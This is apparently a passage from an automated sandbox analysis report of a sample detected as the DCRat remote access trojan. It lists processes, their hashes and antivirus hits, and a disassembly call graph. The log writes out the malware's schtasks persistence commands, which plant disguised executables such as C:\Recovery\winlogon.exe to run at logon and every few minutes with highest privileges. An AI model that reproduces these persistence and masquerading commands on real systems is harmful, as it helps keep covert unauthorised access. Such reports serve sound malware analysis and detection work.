                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
                                                                                            Imagebase:0x7ff623200000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                                                            Imagebase:0x5d0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 70%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                                                            Imagebase:0x380000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:15:26:55
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                                                                            Imagebase:0x7ff7c4b80000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:15:26:56
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Imagebase:0xa80000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Imagebase:0x890000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\winlogon.exe
                                                                                            Imagebase:0x9f0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 70%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:15:26:57
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\winlogon.exe
                                                                                            Imagebase:0x550000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
                                                                                            Imagebase:0x7ff6ccd10000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:chcp 65001
                                                                                            Imagebase:0x7ff7a57d0000
                                                                                            File size:14'848 bytes
                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:39
                                                                                            Start time:15:27:00
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                            Imagebase:0x7ff7f4a60000
                                                                                            File size:108'032 bytes
                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:40
                                                                                            Start time:15:27:05
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                                                                            Imagebase:0x6b0000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:15:27:09
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                                                                            Imagebase:0xd90000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 70%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:15:27:17
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Recovery\winlogon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Recovery\winlogon.exe"
                                                                                            Imagebase:0x230000
                                                                                            File size:832'512 bytes
                                                                                            MD5 hash:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:48
                                                                                            Start time:15:27:18
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
                                                                                            Imagebase:0x7ff6ccd10000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:49
                                                                                            Start time:15:27:18
                                                                                            Start date:29/03/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.3%
                                                                                              Total number of Nodes:1635
                                                                                              Total number of Limit Nodes:58
                                                                                              execution_graph 26062 a3a4a0 GetClientRect 26063 a4d0a0 GetCommandLineA GetCommandLineW 24006 a3f5a5 24007 a3f54e 24006->24007 24009 a3f9e9 24007->24009 24035 a3f747 24009->24035 24011 a3f9f9 24012 a3fa56 24011->24012 24028 a3fa7a 24011->24028 24013 a3f987 DloadReleaseSectionWriteAccess 6 API calls 24012->24013 24014 a3fa61 RaiseException 24013->24014 24030 a3fc4f 24014->24030 24015 a3faf2 LoadLibraryExA 24016 a3fb53 24015->24016 24017 a3fb05 GetLastError 24015->24017 24018 a3fb65 24016->24018 24019 a3fb5e FreeLibrary 24016->24019 24020 a3fb18 24017->24020 24021 a3fb2e 24017->24021 24022 a3fbc3 GetProcAddress 24018->24022 24023 a3fc21 24018->24023 24019->24018 24020->24016 24020->24021 24025 a3f987 DloadReleaseSectionWriteAccess 6 API calls 24021->24025 24022->24023 24024 a3fbd3 GetLastError 24022->24024 24044 a3f987 24023->24044 24026 a3fbe6 24024->24026 24029 a3fb39 RaiseException 24025->24029 24026->24023 24031 a3f987 DloadReleaseSectionWriteAccess 6 API calls 24026->24031 24028->24015 24028->24016 24028->24018 24028->24023 24029->24030 24030->24007 24032 a3fc07 RaiseException 24031->24032 24033 a3f747 ___delayLoadHelper2@8 6 API calls 24032->24033 24034 a3fc1e 24033->24034 24034->24023 24036 a3f753 24035->24036 24037 a3f779 24035->24037 24052 a3f7f0 24036->24052 24037->24011 24039 a3f758 24040 a3f774 24039->24040 24055 a3f919 24039->24055 24060 a3f77a GetModuleHandleW GetProcAddress GetProcAddress 24040->24060 24043 a3f9c2 24043->24011 24045 a3f9bb 24044->24045 24046 a3f999 24044->24046 24045->24030 24047 a3f7f0 DloadReleaseSectionWriteAccess 3 API calls 24046->24047 24048 a3f99e 24047->24048 24049 a3f9b6 24048->24049 24050 a3f919 DloadProtectSection 3 API calls 24048->24050 24063 a3f9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24049->24063 24050->24049 24061 a3f77a GetModuleHandleW GetProcAddress GetProcAddress 24052->24061 24054 a3f7f5 24054->24039 24058 a3f92e DloadProtectSection 24055->24058 24056 a3f934 24056->24040 24057 a3f969 VirtualProtect 24057->24056 24058->24056 24058->24057 24062 a3f82f VirtualQuery GetSystemInfo 24058->24062 24060->24043 24061->24054 24062->24057 24063->24045 26093 a3d8d8 108 API calls 4 library calls 26094 a3f5af 14 API calls ___delayLoadHelper2@8 26141 a3c7b0 100 API calls 24071 a4bdb0 24073 a4bdbb 24071->24073 24074 a4bde4 24073->24074 24075 a4bde0 24073->24075 24077 a4c0ca 24073->24077 24084 a4be10 DeleteCriticalSection 24074->24084 24078 a4be58 __dosmaperr 5 API calls 24077->24078 24079 a4c0f1 24078->24079 24080 a4c10f InitializeCriticalSectionAndSpinCount 24079->24080 24081 a4c0fa 24079->24081 24080->24081 24082 a40d7c _ValidateLocalCookies 5 API calls 24081->24082 24083 a4c126 24082->24083 24083->24073 24084->24075 26143 a40f0f 9 API calls 2 library calls 24085 a210b5 24090 a2644d 24085->24090 24089 a210c4 24091 a26457 __EH_prolog 24090->24091 24099 a2c9d8 24091->24099 24093 a26464 24102 a304e5 24093->24102 24095 a264bb 24106 a2665c GetCurrentProcess GetProcessAffinityMask 24095->24106 24097 a210ba 24098 a40372 29 API calls 24097->24098 24098->24089 24107 a2ca2e 24099->24107 24103 a304ef __EH_prolog 24102->24103 24116 a24846 41 API calls 24103->24116 24105 a3050b 24105->24095 24106->24097 24108 a2ca40 _abort 24107->24108 24111 a323fb 24108->24111 24114 a323bd GetCurrentProcess GetProcessAffinityMask 24111->24114 24115 a2ca2a 24114->24115 24115->24093 24116->24105 26065 a38880 133 API calls 26095 a41180 RaiseException _com_raise_error _com_error::_com_error 26124 a43e8b 38 API calls 4 library calls 26067 a3b090 28 API calls 26097 a4b590 21 API calls 2 library calls 26125 a43a90 6 API calls 4 library calls 26144 a40790 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24854 a3de9d 24855 a3df67 24854->24855 24862 a3dec0 24854->24862 24857 a3d8d8 _wcslen _wcsrchr 24855->24857 24882 a3e8df 24855->24882 24859 a3e54f 24857->24859 24863 a3dbac SetWindowTextW 24857->24863 24868 a3d99a SetFileAttributesW 24857->24868 24872 a3d9b4 _abort _wcslen 24857->24872 24907 a33316 CompareStringW 24857->24907 24908 a3b65d GetCurrentDirectoryW 24857->24908 24910 a2b9ca 6 API calls 24857->24910 24911 a2b953 FindClose 24857->24911 24912 a3c67e 76 API calls 2 library calls 24857->24912 24913 a4521e 24857->24913 24926 a3c504 ExpandEnvironmentStringsW 24857->24926 24860 a33316 CompareStringW 24860->24862 24862->24855 24862->24860 24863->24857 24870 a3da54 GetFileAttributesW 24868->24870 24868->24872 24870->24857 24873 a3da66 DeleteFileW 24870->24873 24872->24857 24874 a3dd76 GetDlgItem SetWindowTextW SendMessageW 24872->24874 24877 a3ddb6 SendMessageW 24872->24877 24881 a3da30 SHFileOperationW 24872->24881 24909 a2cdc0 51 API calls 2 library calls 24872->24909 24873->24857 24875 a3da77 24873->24875 24874->24872 24876 a24a20 _swprintf 51 API calls 24875->24876 24878 a3da97 GetFileAttributesW 24876->24878 24877->24857 24878->24875 24879 a3daac MoveFileW 24878->24879 24879->24857 24880 a3dac4 MoveFileExW 24879->24880 24880->24857 24881->24870 24885 a3e8e9 _abort _wcslen 24882->24885 24883 a3eb37 24883->24857 24884 a3e9f5 24927 a2b4c1 24884->24927 24885->24883 24885->24884 24886 a3eb10 24885->24886 24930 a33316 CompareStringW 24885->24930 24886->24883 